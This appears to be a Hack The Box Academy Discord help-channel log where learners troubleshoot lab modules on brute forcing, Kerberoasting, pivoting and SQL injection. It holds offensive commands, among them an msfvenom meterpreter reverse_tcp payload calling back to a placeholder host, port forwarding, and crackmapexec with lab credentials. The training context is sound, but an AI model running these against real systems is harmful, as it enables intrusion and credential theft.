#modules
Is the path "/usr/share/metasploit-framework/modules/exploits/" the correct one?
Are you reloading msf?
yeah
You can DM if you'd like so I can see your inputs and outputs.
I forgot I had a sub and now I have 1k cubes, most recommended skill path?
Hello i need help with the updated part of Login brute forcing. Hydra always tells me all children were disabled due to too many connection errors. can anyone help me?
Are you targeting the correct port?
yes
Which updated sections are you talking about?
Login Forms and Custom Wordlist
You can DM what you are trying.
ok Thank you
hi folks
I am working on the Commands Obfuscation exercise. I am pretty sure my command is correct. I get no errors but I am also not getting any result. I am using base64 and replacing spaces with %09
Can I ping someone to get a second pair of eyes on my encoding?
Use quotes?
iirc that’s a history command
If you ran cd /home
You can use cd !:1 to use the second argument of the last command (/home)
But yeah use quotes
Try what I said
The index starts at 0 btw, so u could run !:0 !:1 to do the same
Kinda cool
That’s the extent of my knowledge on that
This is not the channel to ask
Go to #careers-and-certs If you can’t access it, read #welcome and follow the three simple steps
Hey there, I hope I'm posting in the proper sub, I did contact the support as suggested and would like to get your input on that matter if I may.
So I'm doing the CDSA cert path currently and I'm at Windows Attack and Defense (but my issue is pretty much with all the modules anyway). Like I was stating the other day, I'm having big time issues with connection and lag to the environment VMs, even worse when we are asked to do an RDP connection from VM A to VM B. Yesterday I spent almost 40mins battling with resizing a powershell window from a Windows VM, in order to grab the command's output, I'm not joking unfortunately. When I contacted Support they said:
I'm ***, use the Pwnbox on the closest region to us and with the US VPN
I was originally using the pwnbox but 1) I would rather prefer to use my own kali machine with all my tools, 2) I had some connection issues anyway and was thinking maybe to switch to a VPN connection from my own Kali machine. So my question is, do you have issues also with the labs? Are you using your own VM or are you using the Pwnbox? I tried Pwnbox WEST US, VPN US, but same thing.
I'm a single dad, working all day and unfortunately with the little bit of time I have for myself, spending 30 - 40mins resizing a window is quite frustrating. I'm reaching a point where I'm starting to skip all the labs and just read / take notes on the lessons, but obviously this is a path to set me straight to failure.
To give some context I'm living in Canada pacific time, I have a 1gig up and down connection at home with 1ms latency average, also I've been using HTB Labs for a while now and I don't really experience any issues with the env.
I usually use the vpn over tcp
But I can’t say about that module
Haven’t done that one
Europe or US ?
Okay, thanks for your input
When you connect to a VM, are you experiencing crazy lags sometimes ? like moving a window around with 5s latency or is it pretty smooth ?
It usually is pretty smooth
I hope someone from West Canada could give me some input, fingers crossed 🙂
Again, this is Advance Obfuscation
Maybe i need to ||reverse|| each command prior to the base64 encoding? But not sure how to accomplish that.
I think it has no spaces
what is %09
you also need to wrap the command in () not {}
that's probably the biggest part
replacing the space
Thanks. Let me take a look
If you need help with a payload please take it to dms
Since it's for a module above tier 0
on the "Kerberoasting" module, can't get the kali machine to access the RDP machine via ssh.
this is the error i am getting
This is on the CDSA path, i would appreciate some help. Been stuck on this for like 3 hours and can't find anything in the forums.
that doesn't look like a kali machine
also there's no kerberoasting module? you're likely referencing a kerberoasting section within a module
the spawn instance button spawns the pwnbox attack box, which is parrot
it's not kali
oooo, so do i have to install kali on my own machine?
no
https://academy.hackthebox.com/module/176/section/1754 read the overview of the lab setup
i have the rdp up
you ssh into the kali machine from the rdp session
in this case the target is the windows machine; and the internal kali machine is @ 172.16.18.20
according to the lab overview
as noted by the lab setup overview depends on the section
also the lab tells you that the username and password for the kali instances are kali:kali
not htb-student
according to what i'm seeing, you don't need to interact at all with the kali instance for this section
well we have to send back a file to the kali machine
i tried the other services but still no luck. i'm not sure if it's just the wrong password or something else. i tried with the username lowercase as well
nvm i think i got it
so in the rdp, i run cmd or powershell to ssh to the kali?
you can use powershell
but again
from what i'm seeing
you don't need to connect to the kali instance at all
you run the kerberoasting attack; retrieve the hash and crack it for the svc-iam user
afterwards you connect to DC1 with htb-student (From the rdp session) - and perform the relevant eventlog lookup to discover the SID of the webservices
you can send that back to the parrot pwnbox or your own vm whichever you prefer to use
you don't need to send it over to the kali machine, the parrot pwnbox has hashcat installed
xfreerdp has the /drive: option to mount a local directory as a sharename
/drive:<name>,<path>
i am cooked idk how to send back to parrot
literally just told you above
i am trying now
this is what i got when i tried to connect to kali
i am going to try the parrot
💔
If you're still stuck you can DM
Maybe a kali machine didn't spawn for this section
Or the internal network is a bit bugged
¯\_(ツ)_/¯
Also as a note: how would you send the file over to the kali machine?
Because the methods would be analogous
its what its asking me to do
i just ate and am trying to get it to the parrot now
don't see where it's asking you to send to kali
We then need to move the extracted file with the tickets to the Kali Linux VM for cracking (we will only focus on the one for the account Administrator, even though Rubeus extracted two tickets).
We can use hashcat with the hash-mode (option -m) 13100 for a Kerberoastable TGS. We also pass a dictionary file with passwords (the file passwords.txt) and save the output of any successfully cracked tickets to a file called cracked.txt:
but how do you propose to transfer the file over to kali? ¯\_(ツ)_/¯
ah there's a sharefolder that's set up [i haven't done this module]
that's just an extra step tbh; all the tools you need are also on the parrot pwnbox ¯\_(ツ)_/¯
shouldn't be this hard
sounds like the lab spawn bugged out
i suggest resetting the lab; changing vpn regions; praying to god
done it twice
have you tried changing vpn regions? this requires restarting the pwnbox as well
to test if the internal network is buggy try connecting to the DC1 ip
via the htb-student creds
wait ima try to change vpns one more time
also suggest to change completely from EU --> US
also the VPN region is NOT the pwnbox region
the vpn regions are the us/eu academy 1-6
i went to US west
that's pwnbox region
not vpn region
the vpn regions don't have a locale like US East/Central/West
vpn region is above the connect to pwnbox
the vpn region is what dictates the target spawns and things like that; the pwnbox region is solely just for the region the pwnbox spawns in for least ping relative to you so you can interact with it smoothly
there's US and EU
i suggest changing completely from US to EU
i.e. instead of going from US-academy-1 to Us-academy-3 going to EU-academy-1
ok
now the rdp isnt working
i am coming back to this tomorrow
thank you for the help though @fathom pendant
i am going to review your points tomorrow, it will click
when you change vpn regions you need to respawn the pwnbox
and the target

Dont we all
Dm me
if you can't ask for help publicly gonna go off the assumption you want help doing something illegal
Is it illegal ?
no idea since you haven't said what you want help with
then reach out to whatever support for whatever you got hacked on
if it was your personal device that got hacked, don't download and run shady programs
this channel and server really isn't a help forum for people who got hacked
99.9999% of the time a suggestion for once you get hacked is:
- change passwords and enable 2FA if possible
- backup important files
- reinstall windows/your operating system completely
I'm really confused why jtr is detecting a hash on the pwnbox but not on my local machine with the same exact file. any ideas?
im on the protected files module in the password attacks section on cpts
i need help in machine try to get the flag ..
if you need help with a machine on https://app.hackthebox.com there's #boxes channel, you need to read and follow #welcome to access
thanks, im probably not asking this in the right spot
i think she was talking to @rustic sage
you're asking in the right channel
not sure what the issue would be between your own machine and parrot
in terms of why jtr detects one and not the other
well and pwnbox
yeah and the file has the exact same hash when i run md5sum
i didn't have any issues on my own parrot machine when i ran through this a while back
I'm using fedora on my own machine for htb, but i don't think fedora would have packages that are old
same, 1.9
r u getting any error messages on ur local machine
no, just that john couldnt detect the hash
what os is your local machine
oh you already answered this
i also don't have any of the 2john packages on this installation, im not sure how to get them either
maybe pwnbox has the jumbo version of john and your local machine doesnt
huh ok i didn't know there is a jumbo version
yeah that would probably be it, the jumbo version is the one with the 2john
thank you!

click the first link that tenor failed to embed
got jumbo john working, and that fixed it completely! maybe that should be a hint or something in the module so someone else doesn't spend 2 hours wondering why their version of john doesn't work bc they installed it with the package manager instead of github
well it's the default install for parrot and kali (which is what most people are using)
most people don't even know the john that's installed is the jumbo one
¯\_(ツ)_/¯
fair enough, using fedora just means it takes a little longer to get some tools running
but then i dont need to spin up a vm to do htb
you should be doing pentesting from a vm regardless
that way you don't run into issues that would require a reinstall; better to recreate/rollback a vm than have to wipe and reinstall your own OS
not to mention you risk your own device security
¯\_(ツ)_/¯
coming back after a pretty long period of not doing any practice, was wondering if it's possible to reset the filled in questions in modules?
(reset module button after clicking finish doesn't actually reset any questions)
i've heard this before, why does it risk your own device security?
i mainly don't do it from a vm so it doesn't kill my battery life
i can see that it could risk it when I start upload servers in directories with private info, which I've def done a good bit before lol
opening/closing ports
potentially exposing sensitive directories
potentially downloading/accidentally running a malicious script
yeah fair enough ive done all of those so far lmao
I've left a download server straight to my docs folder open for 2 days one time and i had a copy of my id on it
it wasn't accessed by anyone tho luckily
whenever htb introduces a new malicious script i always run it on my own pc first to see what a normal computer output would look like too
well yeah the problem you have to remember is: while connected to the vpn other users on the same server can potentially reach your machine (while there are protections in place, alongside this being against ToS, you still wanna operate under best practices)
i suggest doing it on a vm, for the same reasons as stated above too; a vm is not much different than a "normal computer"
it's just a virtualized computer environment
Hm how do you get role
by just doing basic nmap scans?
yeah it's definitely a better idea to do htb on a vm
not all nmap scripts are safe, some are DDoS and some can crash given the right circumstances
Running malware on your host machine is a disaster waiting to happen
read and follow #welcome
Thank
doing an nmap scan isn't HTB introducing a "new malicious script"
Pwnbox instances working for anyone else? Constant failing due to request validation failed
Room -> https://academy.hackthebox.com/module/77/section/843
but even still, i recommend keeping your host/daily OS as secure as possible
ctrl+shift+r to refresh the page and try again
also it's not a "room" it's a module section, room is THM speak, and we don't do that here
also try: logging out then logging back in
Should've been more verbose with my issue, I've attempted refresh several times. Changing servers, etc
otherwise; reach out to support
that's really the only other people that can help you
if it's a backend issue nothing that anyone else can troubleshoot for you
loaded fine for me
alright, i'll do my due diligence and see if i can get it working. ty for helping me on the "module section"
proper terminology is important ¯\_(ツ)_/¯
Spent a lot of previous time with THM, just what I'm used to saying ¯\_(ツ)_/¯
But indeed, words are important
Grammar is the difference between helping your uncle, Jack, off a horse, and helping your uncle Jack off a horse.
it helps prevent future situations where you don't specify and someone asks "what do you mean by room?"
mb i was more wondering how users on the vpn find other users on it, and how there are protections in place
im just curious
when you run the vpn connection you connect to an endpoint server and are assigned a 10.10.0.0/16 IP if i'm recalling correctly; while HTB can do some gateway stuff on the vpn server, it's not gonna stop someone determined enough to work around it
I mean thats basically what hacking is: being determined enough to break something and make it do things you want it to do that are unintended
A newbie given enough time and having enough determination could hack an insane machine
Hi, my name is Tammy and I am new to HTB. I am trying to do one of the machines and I know how to secure shell into it but there's no response. I can ping it but it won't connect.
I am trying to copy and paste a screenshot.
I am not even sure I am in the right chat.
what machine are you trying to do?
Escape2
there is a channel for that, #1327698295102898246 , if you cant access it read #welcome to become verified and gain access
but also, i'm 99.999% sure escapetwo didn't have ssh enabled. You can only ssh into a machine if it has ssh running.
ok, thank you. Then how am I supposed to work in the machine? Lol
It doesn't, it's got winrm/rdp
it's a windows active directory box, specifically a domain controller, you can interact with services like kerberos, smb, winrm, ldap, etc. if you don't know what any of those terms mean you should do some research on active directory and learn about it
it's going to be very difficult to hack into something you don't understand at all
ok, I need to review before I try this box then
Not review, study
You're right!
And I will
hackthebox academy has a very well made module on active directory if you are interested
several* ad modules
Here's the one tool you need to study a lot of for AD: netexec
it will basically take you from 0 to being able to do medium ad boxes
from intro to ESC's
oops ye, but i was specifically referring to active directory enumeration and attacks
for foundations
intro to AD will be more useful basic foundation
true
Actually I started the academy, I just need to continue it.
personally i didn't like that module, it felt like just a bunch of lists of definitions
ok
that's a LOT of the intro to X modules
I have done some
Intro to AD was fun, was a lot of theory and was pleasantly surprised by how much I could do during the labs without needing the solution(provided I've done the powershell intro module)
starting point doesn't prep you well for standard boxes imo
True... this is why I'm having to go to academy 😅
just because starting point boxes were made back in the early days of HTB, the difficulty of boxes has scaled linearly over time, where an easy box now may have been an insane box back then
I will have more time to delve into the academy this weekend.
they're good for introducing basic concepts; but overall they don't prep you for more advanced
Yeah... you're gonna need a lot more than 1 weekend
wow didnt realise there was that big of a difference
Oh, I know that but I have to start somewhere
I do it at least a section daily, I don't actually do just 1 section a day but I just tell myself I only have to do 1 section to help me get started
HTB is very different than TryHackMe
One section is a good start, it's a lot to digest at tims
times
HTB throws you into the deepend really quickly with theory and then asks you to practice that theory
That's what I want
THM holds your hand a lot, HTB labs throw you in and expect you to research what you don't know
It will be good for me
academy is good at helping you visualize theory while not directly giving you answers
Asking you to research also helps your research skills which is a key skill in cybersec
I like that way of learning
my biggest tip is, and always will be, (aside from take notes) be able to think critically
sometimes you have to make leaps of logic
good to know
because sometimes it is a case of "wow, the admin is that stupid"
Lol
i.e. the root rsa key and the user rsa key being the same
Yes, that is not good
but a lot of what you'd find in the real world is surprisingly dumb
I have done a lot of rooms on TryHackMe and taken a ton of notes but you're right, they do hold your hand a lot so I haven't retained as much as I would like to.
HTB certifications are at least noticed by employers
i'm refactoring my notes once i get my desk set back up; biggest thing is understanding why a thing is, not just that it's the thing to do
not YET 😉
really?? ive always heard that they're very unknown
I just helped someone with the footprinting DNS section, i was curious how the dnsenum script actually works; found out it basically does an nslookup/dig of the wordlist.domain or wordlist.sub.domain
HTB only been around a tenth of the time their competitors, the fact that they're already this popular just says something
utilizing the provided nameserver IP
Well I have noticed different things but I am not sure as to what extent they are noticed by employers
i really hope they are more noticed by the time i start looking for a job lmao 🙏
i figured out it worked that way by doing
dig answer.to.question.domain @ip and nslookup answer.to.question.domain @ip
But I don't know for sure
they are tough but fair
its cool that it is that simple
when you get stuck and move past it or fail due to something silly you couldn't get past you know that it's an issue with you and not the course
the exams don't toss anything at you that wasn't taught in the course
Ok, I believe that. They want you to learn.
It's just putting the time and energy in to do that!
yep; it's why it's recommended to do the capstone module (Attacking Enterprise Networks) blind, spin up the target and don't answer questions until you hit domain compromise
Hmmm....there is so much more to HTB than THM!
The modules are different than the academy? Or are they part of learning paths as well?
another thing i advise people to do: is when you get an unexpected error, document how you resolved it
modules are part of academy
some are put in learning paths
the job role paths organize a set of modules in a recommended order to do them in
I will look at that once I get past the foundations path I am on
👍
can I add you as a friend?
sorry i don't add friends (sometimes that ends in unsolicited asking for help and advice, which gets exhausting)
ok, no problem
anything that can be asked about a module section has likely either already been asked or answered in here or has someone that can be like "yeah you just do this" in here
it's why it's recommended to say what module and section you're on; so others can utilize the handy dandy discord search feature to find info
Good point, I forgot about that as well, lol
I will be going through some modules and will write notes to ask here when I get stuck.
I downloaded the parrot OS box HTB version. I downloaded the vpns and when I went to get on my box tonight, neither download was there. Why is that
you need to download the vpn inside your vm
also make sure you're booting into the os and not the iso
(you'll need to dismount the iso after doing the try/install process)
how do I dismount it?
depends on the hypervisor, but should be able to from settings
This is a pain in the ASS!!! LOL
you only have to do it once 😄
I am going to have to look up how to do that. But is HTB version the right iso to download?
any version of parrot will work
Lol
there's nothing special about the HTB edition
Maybe I will uninstall it and then reinstall a different version then
i mean, why?
no matter how you slice it the steps would be the same
you'd still need to dismount the iso after installing
Cause I am new to a lot of this so I don't really have a great understanding of it all yet
If you have booted correctly into the vm and can use it, then just download the vpn inside the vm
sometimes (a lot of the time) virtualbox prioritizes booting off the optical drive (iso) over the virtual disk
I did but when I restarted the machine the downloads weren't there
wellll... did you put them in the temp directory?
if you saw try/install when you booted it back up, it's still launching into the iso
seems very strange that it should do that if it has a valid virtual disk
they were in the downloads dir
that's literally what i'm trying to say
boot order priority
it sets the optical disk > virtual disk

if you still see try/install when you load up the vm, it's still loading into the iso
it is
so you need to dismount the optical drive; which can be done from the virtualbox settings
and restart the machine
and it should boot into your virtual disk image
👍
I am looking at my settings now.
should be under Storage (virtualbox)
how do I do a screenshot
you can't share a screenshot unless you've linked your account via the method in #welcome
If anyone is struggling on confusion algorithms PLEASE use this on burpsuite, it’s way way easier https://youtu.be/ov9yT4WAuzI?si=NRwXgn1gMfwWKbP_
update burp! Follow solution 1!
we're veering off-topic i suggest creating a post in #1024429874246590575 so we're not flooding the chat
ok, I will go through the welcome thing right now
anybody can help me with this? because i already restarted the machine, but when i scp chisel into the server and start chisel on the server, it tells me that GLIBC is not found
you need to statically compile chisel
how can i do that?
i mean you can use discord's search feature to look up the words "static compile" and that should help
okayy marcielee thanksss for the info

Module: Using Crackmapexec
Section: Stealing Hashes
Chisel just doesnt want to work for me tonight,can anyone do a sanity check and see if I am doing this wrong?
sudo chisel client 10.129.55.142:8080 socks
2025/01/23 23:49:05 client: Connecting to ws://10.129.55.142:8080
2025/01/23 23:49:05 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2025/01/23 23:49:05 client: Connected (Latency 28.785871ms)
I then run the command and get nothing back
proxychains4 -q crackmapexec smb 172.16.1.10 -u grace -p Inlanefreight01! --shares
verified /etc/proxychains.conf and /etc/proxychains4.conf show
socks5 127.0.0.1 1080
Any clue why I can't get scans through chisel?
try with sudo
also use netexec instead of crackmapexec as cme is no longer maintained
Thanks!
as stated by the question it uses multiple filters, the lfi module likes to build upon previous section knowledge, so try combining techniques
Hey guys, can someone help me with this: Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable. https://academy.hackthebox.com/module/21/section/128 . I have been working on it for ages and still no result, no resources could help me. I would really appreciate if someone could direct me
i mean the instructions are fairly clear
for this module HTTP Attacks and exercise Exploitation of Request Smuggling , is the vulnerability a CL.TE vulnerability? i'm having a difficult time following this page. All of the steps show a CL.TE for practice, and so far the practice and the exercise match for the most part during the rest of the module.
there are a few considerations to make when you read the instructions:
- there are multiple steps involved
- encode the var 28 times
- the salt (which is used further down the line) is the length of var
- sometimes new-lines can get counted as a character
- The answer isn't the length of the var, it is the output of the script after you've successfully created the loop
thank you very much, i will try that
in the future try not to just screenshot the question; include
- what you've tried
- what you think you should be doing
- the module and section name
avoiding spoilers where possible
if you get any errors, those also help with understanding what you might be stuck on
Alright, I will keep that in mind, thanks for helping me!
Creds: Authenticate to <SNIP> with user "sql_dev" and password "Str0ng_P@ssw0rd!"
Sorry, it's first time that with the credentials I cannot log in and I do not understand whether it is intentional or an error;
I have tried both, RDP and WinRM
Thanks for the help!
in Windows Privilege Escalation > SeImpersonate and SeAssignPrimaryToken
There are other services that you can try to authenticate to apart from WinRM, SMB, RDP and etc
It was actually shown in the section
Thanks
erm... our messages got deleted
Yeah, don't need their name or server here. For anyone curious, if someone reaches out to you to join a "HTB Support Server", do not. They are NOTHING to do with HTB.
btw can someone help me with this problem please?
that output is fine; weird that there's a 10.0.16.18, didn't think you could be assigned a 10.0.x.x ip address
maybe you mistyped
:)
i got it to work - it didnt work before as i ran it in a tty
also that's related to the Attacking enterprise networks module; which is a t2 module
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
btw, am a bit worried after joining the scam channel earlier ... i didn't download anything from there - all i did was click on the dm and join their channel and click on 'start a ticket' which opened a private chat with the scammer 😦
i suggest just blocking and leaving the server
i did
as long as you didn't do any 3rd party authentication your account is fine
they can't hack you just by having you join a server, they use a phishing webhook tool that basically grabs your auth token that they can use to take over your account, this type of attack also bypasses 2FA
and the phishing webhook tool has to be downloaded by the user 1st?
nope
so some websites have the ability to allow 3rd party apps, through API calls, to authenticate in order to provide some functionality.
as an example; Path of Exile 1/2, there's a popular filter creation website called filterblade, filterblade has a functionality to sign in to your Path of Exile account to sync your filter to an online folder, which prompts the "allow this app to do things" type prompt (uploading the file to the API)
I just got done with the password attacks module!
im just happy bc its a hard module imo and it took me a while
ah like 3rd party websites asking if u want to sign in with your google account?
yep
ok but what puzzles me is that in the private chat with the scammer, he asked why i dont have a node... and asked for my wallet. how would he know if i have a node or not? ?_?
ok phew
nice! that's one of the worst considering how long it takes
Need help with info gathering subdomain bruteforcing inlanefreight.com
Use subdomain to find missing subdomain by bruteforcing. I have found the 1 not listed previously but it's not the correct answer.
Is xfreerdp the only application that can do pth?
There's always more than one way to perform an attack
I'm talking about RDP specifically
I believe remmina has a section to put a hash, haven't touched it in a minute
Try refreshing the page, if that doesnt work. Dm me the subdomain you think it is/the command output
@fathom pendant thank you
Sometimes weird cache issues cause the answer to not accept
Also make sure you don't have an additional space
not sure if this is the correct chat, I have been doing starter modules about ffuf and I can access the target machine without vpn. Should this be happening or am I understanding something wrong? thanks
If it is a Docker container (target specifies IP and port), you can access this machine from anywhere.
hi, i'm learning the module NTLM Relay attacks, and i'm testing the WebDav attack on my computer.
can someone tell me, has the WinSearch Service on Windows 11 23h2 removed the Webclient Service by default? I can't really find any documentation on this, how can I determine it exactly
i don't think so also you don't need to spam your question
i believe in most cases webclient isn't even installed by default
in my vm, windows 11 23h2, it's enabled by default, but it's stopped
then start it ¯\_(ツ)_/¯
but im wanting to start it via searchConnector-ms to perform a WebDav attack
and i tried on win10, it works, but not on win11
Sorry for the noob question I have connected to the VPN and generated the target machine. How can I be sure I have done it correctly?
i mean windows 11 also, generally, just sucks
can you connect with or attack the machine in the manner described by the section?
All you need to know about the VPN Connection for Academy
ipconfig and get IP via VPN
probably no, ffuf counts errors incrementally to the requests
like this
ffuf counting errors is likely a you issue, and not a vpn issue. what module and section are you doing?
ffuf module
and section?
in the beginning, directory fuzzing
what's your syntax?
where can I read documentation about win11? does microsoft seem to only provide documentation for win10?
microsoft providing adequate documentation? 
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://ip:port/FUZZ
and you're replacing the ip:port with the spawned IP and port (this doesn't require being connected to the vpn btw)
i think not..
.
yess
copy/paste exactly from terminal to here (to copy from terminal ctrl+shift+c) and wrap in backticks so discord doesn't format it weirdly
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://ip:port/FUZZ
:: Wordlist : FUZZ: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [120/87664] :: Job [1/1] :: 3 req/sec :: Duration: [0:00:52] :: Errors: 80 ::
if you wanna do codeblock you can just
```
output
```
instead of doing it line by line
formats it rather nicely don't ya think?
i'm assuming you're redacting the IP:port you spawned
redacting? not native 😄
hiding/obscuring
yes
i found it
please don't do that
.
so why the errors?
i don't know
ook
if you actually provided the ip:port i can see if it works on my machine, worked on a fresh spawned target on my end
send that section link here
i've already done that module, i think I'll remember something
also the module uses /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
minor difference
I have kali on my vm where the path is different
caught it immediately
seclist != dirbuster
:p
ok
i think this module has nothing to do with vpn
scanned from pwnbox btw, works fine
moreover just found: -rw-r--r-- 1 root root 725439 Feb 27 2009 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
that's fine
it has 644 perms; meaning that anyone can read it
shouldn't matter for a program using it as a program is reading it
not writing or executing it
either way seems like it's something to do with either your environment or your ffuf install
since i was able to scan your target just fine
as a note; if the wordlist you're using has comments adding -ic tells ffuf to ignore comments
aka any lines that start with #
@subtle heron my best guess is it's something to do with your environment considering the output you shared shows 3 req/sec
which is PAINFULLY slow
yes, I have configured my vm wrong
switch the networking mode from NAT to bridged or the other way around
i forget which one unclogs the drain for it
someone told me that :-)
anyone solved the second part of the login brute force skills assessment? after getting an SSH session I'm stuck
See what other ports are open on the ssh server, and what files you can find on that machine.
I did an nmap scan on the local host and found there is an FTP server, but when I brute force my login to it, it takes so much time when using rockyou.txt or finds nothing when using the provided lists
You should look at the files already present on the machine you've ssh-ed into. You'll see that you don't need rockyou.txt
there is password file i can use but also several username lists , is it to try to make a wordlist of all of them by cupp
In the whole Login Bruteforcing module you're supposed to have, at least, heard of the tool username-anarchy, you should find a folder with that name on the server, I'll let you guess what you're supposed to do with it;
i will give it a try and see what can i get
AD Enumeration & Attacks - Skills Assessment Part I
Hello, I was curious to see how people had answered question 2: Submit the contents of the flag.txt file on the Administrator desktop on MS01.
I found some tutorials online and I'm startled to find out that everyone seems to be able to launch port forwarding through meterpreter but I can't seem to be able to do it. Here are the commands that I use:
msfconsole
use multi/handler
set lhost my_tun0_ip
set lport 9999
set payload windows/x64/meterpreter/reverse_tcp
run
Then create the payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=my_tun0_ip LPORT=9999 -f exe -o meterpreter_reverse_tcp_9999.exe
Then, on the web shell, upload the payload and run it.
Then, I get a meterpreter shell, I run:
portfwd add -l 1234 -r||172.16.6.50|| -p 3389
And it's successful, however when I try starting an rdp session with MS01:
xfreerdp /v:localhost:1234 /u:||svc_sql|| /p:||lucky7||
It keeps failing. However, in few tutorials that I've seen, the very same commands seem to work. Can anybody help me troubleshoot this?
you may want to redact spoilers
yep sorry I didn't know you couldn't mask something in code
awesome, I made a list of usernames from the user in the incident report, then brute forced his login with the passwords there and got the password
Congratulations on finishing login bruteforcing!
thanks bro for the hints
Hello, i am on footprinting lab - Hard. I am running snmpwalk -v2c -c @ my target but it is displaying a time out no response. I have reset my target twice, any ideas on where i am going wrong?
i figured it out, how would we know the community string beforehand? I feel like I missed something in the enumeration, I just stumbled on what the community string was via onesixtyone
yo guys
im trying to install AD powershell module
as the intro into cmd suggests
it says the only official way to install it is using this command Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online
and its not working
i get this error
```
Add-WindowsCapability : Cannot validate argument on parameter 'Name'. The argument is null or empty. Provide an
argument that is not null or empty, and then try the command again.
At line:1 char:46
+ ... indowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online
+                                              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Dism....apabilityObject:PSObject) [Add-WindowsCapability], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.Dism.Commands.AddWindowsCapabilityCommand
```
welp
Can you try this one:
```
Get-WindowsCapability -Name "RSAT*" -Online | Where-Object { $_.State -eq "NotPresent" } | ForEach-Object {
    Add-WindowsCapability -Name $_.Name -Online
}
```
i feel like its better to use foreach-object to properly loop over each capability name
gonna try rn
isn't it better to use "RSAT`*" so PS doesn't recognize the star as part of the string?
also exception
```
$.State : The term '$.State' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:62
+ ... dowsCapability -Name "RSAT*" -Online | Where-Object { $.State -eq "No ...
+                                                             ~~~~~~~
    + CategoryInfo          : ObjectNotFound: ($.State:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
```
the wildcard RSAT* works as expected in the Get-WindowsCapability cmdlet
```
Get-WindowsCapability -Name "RSAT*" -Online | Where-Object { $_.State -eq "NotPresent" } | ForEach-Object {
    Add-WindowsCapability -Name $_.Name -Online
}
```
this should do the trick
spray and pray
fingers crossed
hey guys
same exception ^
what do you get with Get-WindowsCapability -Name "RSAT*" -Online ?
```
State : NotPresent
DisplayName :
Description :
DownloadSize : 0
InstallSize : 0
```
not present hmm
i guess i need something like sudo apt update but on powershell lol
right. now. doing.
same output ^
might do Get-WindowsUpdate
and update the os
not really sure, Get-WindowsOptionalFeature -Online | Where-Object {$_.FeatureName -like "RSAT*"} might work too
never had this issue tbh
last shot before attempting updates
hmm it just said.. ok
no output
but not installed
what os version are you on?
Get-ComputerInfo | Select-Object WindowsEdition, WindowsVersion
Hey guys, I am currently working on the "Unconstrained Delegation - Users" section from the Kerberos attacks module. For some reason after setting everything up to obtain the hash of the DC, I get connection messages without the ticket.
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.205.35
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
what build
i downloaded it old on purpose since htb recommended starting with it before creating restore points and update
really
Use the target flag
Microsoft Windows [Version 10.0.14393]
the more the windows updates, the worse it gets
IMPORTANT: Starting with Windows 10 October 2018 Update, RSAT is included as a set of "Features on Demand" in Windows 10 itself. See "Install Instructions" below for details, and "Additional Information" for recommendations and troubleshooting. RSAT lets IT admins manage Windows Server roles and features from a Windows 10 PC.
install this
ooo nice
should work with the build you have
This worked! Thank you.
Is there any reason for it not working without the target flag?
It looks it will
Probably some changes either in krbrelayx or in Impacket.
Ahh y nothing wants to work today
honestly just update the os
or maybe someone else can help you with that build you are on
but im lost
np
hi guys
i'm doing the sql injection module end of chapter exercises
I am starting by trying to confirm that the page is vulnerable to injection by using characters such as " ' ) etc. into where the application allows input
I am not able to get the page to respond in a different way. So I am wondering do I need to perhaps fuzz for other pages or are there other ways to identify an injection entry point?
Module yara and sigma, an s is missing, found more typos along the way but didnt keep track of them in case any of the staff cares
Hi guys, I'm in the Setting Up module, in the Organization part at Logging. I need to replace the PS1 variable in .bashrc with the one they suggested so I can have the date and time. When I check in .bashrc there are like 3-4 PS1 variables. Which one do I need to change, if not all of them?
post in #1234357888114364508
What is the reason for including the -sV and -sC flags here? Aren't they already included in -A?
Yes they are, just don't overthink these kind of stuff too much lol.
The writer is probably used to writing it this way.
Good catch, it's good you're questioning stuff like this.
end of module skills assessment in SQL Injection. I'm not able to find the SQLi entry point... any hints?
I've tried the special characters such as "' " ) # etc. but I don't get a different response from the page
Is that the login page?
yes sir
Have you tried any bypass techniques?
not yet
i figured I would just try to identify the sql injection parameter first
ok i'll try some bypass
but just for my understanding. if it's vulnerable to an auth bypass injection should it not reveal the injection point just by inserting a "'" or something?
or is this a case where I'm not getting feedback from the page
?
I am in the section: Remote/Reverse Port Forwarding with SSH
I am trying to discover the Windows host with proxychains and nmap. But I can not find it. I've done this: sudo ssh -D 9050 ubuntu@10.129.110.197
and
proxychains nmap -v -Pn -sV 172.16.5.19
The output says that the host is down, no services are running. But that is not true because I am logged in via remote desktop.
By the way I can not copy and paste image on the chat
you use sudo with proxychains
So I'm pretty sure I'm on the last part of the footprinting hard lab. I have tom's access to the mysql database, I have been looking through tables and databases with the mysql commands but I am having trouble finding the info I need for the HTB, can anyone nudge me a bit?
Yes
Sorry had to get back to work. Yeah not always going to get an error or any information to leak out.
Hi thx. Appreciate the response. Managed to complete the module. Thanks for confirming
Confirming
